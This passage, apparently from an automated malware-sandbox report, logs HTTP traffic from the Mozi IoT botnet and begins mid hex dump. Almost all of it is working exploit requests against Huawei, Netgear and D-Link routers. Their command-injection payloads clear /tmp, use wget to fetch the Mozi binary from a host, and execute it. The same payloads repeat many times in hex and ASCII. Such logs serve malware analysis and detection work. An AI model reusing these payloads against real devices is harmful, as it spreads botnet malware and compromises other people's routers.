63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 93.41.229.147:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 154.93.41.99:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 1.9.218.126:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</Inte
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 121.151.98.14:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
